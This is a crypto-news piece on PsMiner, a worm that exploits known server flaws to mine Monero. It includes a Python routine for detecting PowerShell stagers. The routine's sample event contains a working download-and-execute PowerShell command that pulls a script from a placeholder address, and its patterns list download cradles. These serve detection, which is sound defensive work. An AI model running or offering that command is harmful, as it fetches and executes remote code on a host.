Modular Worm-Like Malware Exploits Known Flaws In Some Servers To Mine Monero (XMR)

Monero (XMR) has recently been updated.

The update was overall a successful one; even though there seemed to be some trouble with the hash rate, things were expected to settle eventually.

Monero successfully completed the update, which included tweaks to the PoW algorithm for better ASIC resistance, changes to mitigate big bang attacks, and enhanced transaction homogeneity to further improve privacy.

The Monero update was a successful one, but it seems that the hash rate of the XMR network has been severely hit.

On Reddit, experts are saying that everything will get back to normal in a few days.

Another Monero exploit

Now, Monero (XMR) is in the news again, this time because of illicit mining.

Bleeping Computer just revealed that there is a modular malware with worm-like features that exploits known flaws in servers running ElasticSearch, Hadoop, Redis, Spring, Weblogic, ThinkPHP, and SqlServer to spread from one server to another and mine XMR.

“Systemctl.exe, the worm module of the malware named PsMiner by the 360 Total Security researchers, is a Windows binary written in the Go language which bundles all the exploit modules used to hack into vulnerable servers it can find on the Internet,” the online publication reveals.

It seems that besides these exploits, the worm module can also force its way into any target it finds that uses weak or default credentials, and it is also able to crack user credentials via “an additional brute force password cracking component,” according to Bleeping Computer.

After PsMiner gets into the victim’s system, it executes a PowerShell command that downloads a malicious payload named WindowsUpdate.ps1.

This is the malware’s master module designed to drop the XMR miner as part of the final infection stage.
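As an added illustration, not taken from the article or from the 360 Total Security research, here is a small triage routine over constructed Sysmon-style process-creation events that flags PowerShell launched by a server process with a download cradle on its command line, the chain described above. The parent-process names, the regex patterns, and the sample events (including the TEST-NET address) are assumptions of this example.

```python
import re

# Sample process-creation events, constructed for this example in a flat
# Sysmon-like field layout (Image, ParentImage, CommandLine).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Java\jre\bin\java.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/WindowsUpdate.ps1')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

# Host processes of the services the article names (ElasticSearch, Hadoop, WebLogic
# and Spring usually run under java.exe; Redis and SQL Server under their own
# binaries). This list is an assumption: tune it to what actually runs on your hosts.
SERVICE_PARENTS = ("java.exe", "redis-server.exe", "sqlservr.exe", "php-cgi.exe")

# Download cradles and stager switches; this pattern list is my own, not taken
# from the researchers' write-up.
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                    r"|invoke-restmethod|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)
HIDDEN = re.compile(r"-(?:w|windowstyle)\s+hidden|-nop\b|-noprofile\b", re.I)
PAYLOAD = re.compile(r"windowsupdate\.ps1", re.I)  # file name reported in the article

def score_event(event):
    """Return the reasons an event looks like a PowerShell stager; empty if benign."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return []
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    reasons = []
    if CRADLE.search(cmd):
        reasons.append("download cradle on command line")
    if ENCODED.search(cmd):
        reasons.append("encoded command")
    if HIDDEN.search(cmd):
        reasons.append("hidden window / no profile")
    if PAYLOAD.search(cmd):
        reasons.append("references WindowsUpdate.ps1")
    if parent in SERVICE_PARENTS:
        reasons.append(f"spawned by service process {parent}")
    return reasons

def triage(events, min_reasons=2):
    """Events carrying at least min_reasons indicators, paired with those reasons."""
    return [(ev["CommandLine"], score_event(ev)) for ev in events
            if len(score_event(ev)) >= min_reasons]
```

Requiring two or more indicators keeps an administrator running a local script from a desktop session out of the alert queue while still catching a service process that spawns a hidden PowerShell fetching a script from the Internet.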

You can find out more details on this malware in Bleeping Computer’s article.
